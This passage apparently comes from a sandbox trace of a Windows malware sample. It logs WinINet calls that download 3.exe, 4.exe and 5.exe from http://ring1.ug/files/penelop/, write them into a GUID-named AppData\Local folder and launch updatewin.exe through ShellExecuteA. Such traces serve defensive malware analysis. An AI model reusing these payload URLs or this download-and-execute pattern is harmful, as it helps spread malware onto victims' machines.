lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.976] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.976] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.016] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.016] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.016] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.017] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.017] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.017] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.017] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.018] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.018] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.018] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.019] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.019] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.057] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.059] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.059] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.067] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.067] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.068] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.068] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.069] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.070] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.070] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.070] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x1e00) returned 1 [0044.071] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x1e00, lpOverlapped=0x0) returned 1 [0044.071] CloseHandle (hObject=0x670) returned 1 [0044.074] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0044.079] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0044.079] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0044.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0044.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3d8 | out: hHeap=0x660000) returned 1 [0044.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0044.127] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0044.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b1c8 [0044.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x84e) returned 0x3268798 [0044.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328b1c8, cbMultiByte=-1, lpWideCharStr=0x3268798, cchWideChar=1063 | out: lpWideCharStr="http://ring1.ug/files/penelop/3.exe") returned 36 [0044.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x850) returned 0x32acff0 [0044.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0044.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b1c8 | out: hHeap=0x660000) returned 1 [0044.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x850) returned 0x3268798 [0044.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x827) returned 0x9c70758 [0044.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring1.ug/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x9c70758, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring1.ug/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0044.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0044.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c70758 | out: hHeap=0x660000) returned 1 [0044.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0044.127] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring1.ug/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0044.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0044.298] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9b6d6d0, lpdwBufferLength=0x9b6d710, lpdwIndex=0x0 | out: lpBuffer=0x9b6d6d0*, lpdwBufferLength=0x9b6d710*=0x4, lpdwIndex=0x0) returned 1 [0044.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0044.298] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0044.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b5f0 [0044.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x84e) returned 0x3268798 [0044.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328b5f0, cbMultiByte=-1, lpWideCharStr=0x3268798, cchWideChar=1063 | out: lpWideCharStr="http://ring1.ug/files/penelop/4.exe") returned 36 [0044.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x850) returned 0x32acff0 [0044.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0044.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b5f0 | out: hHeap=0x660000) returned 1 [0044.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x850) returned 0x3268798 [0044.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x827) returned 0x9c70758 [0044.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring1.ug/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x9c70758, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring1.ug/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0044.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0044.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c70758 | out: hHeap=0x660000) returned 1 [0044.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0044.299] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://ring1.ug/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0044.455] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0044.455] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x9b6d6d0, lpdwBufferLength=0x9b6d710, lpdwIndex=0x0 | out: lpBuffer=0x9b6d6d0*, lpdwBufferLength=0x9b6d710*=0x4, lpdwIndex=0x0) returned 1 [0044.455] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0044.455] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0044.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b660 [0044.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x84e) returned 0x3268798 [0044.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328b660, cbMultiByte=-1, lpWideCharStr=0x3268798, cchWideChar=1063 | out: lpWideCharStr="http://ring1.ug/files/penelop/5.exe") returned 36 [0044.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x850) returned 0x32acff0 [0044.455] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0044.455] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b660 | out: hHeap=0x660000) returned 1 [0044.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x850) returned 0x3268798 [0044.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x827) returned 0x9c70758 [0044.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring1.ug/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x9c70758, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring1.ug/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0044.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0044.456] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c70758 | out: hHeap=0x660000) returned 1 [0044.456] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0044.456] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://ring1.ug/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0044.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0044.768] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x9b6d6d0, lpdwBufferLength=0x9b6d710, lpdwIndex=0x0 | out: lpBuffer=0x9b6d6d0*, lpdwBufferLength=0x9b6d710*=0x4, lpdwIndex=0x0) returned 1 [0044.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b708 [0044.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b708 | out: hHeap=0x660000) returned 1 [0044.768] lstrcpyA (in: lpString1=0x322d430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" [0044.768] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe") returned 1 [0044.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0044.768] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0044.768] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0044.768] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.807] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.807] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.845] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.846] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.851] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.851] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.885] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.885] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.890] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.890] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.890] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.890] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.891] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.891] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.891] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.891] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.923] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.924] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.928] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.928] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.929] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.929] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.929] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.930] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.932] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.933] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.933] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.933] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.965] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.965] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.966] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.966] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.969] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.969] InternetReadFile (in: hFile=0xcc0024, 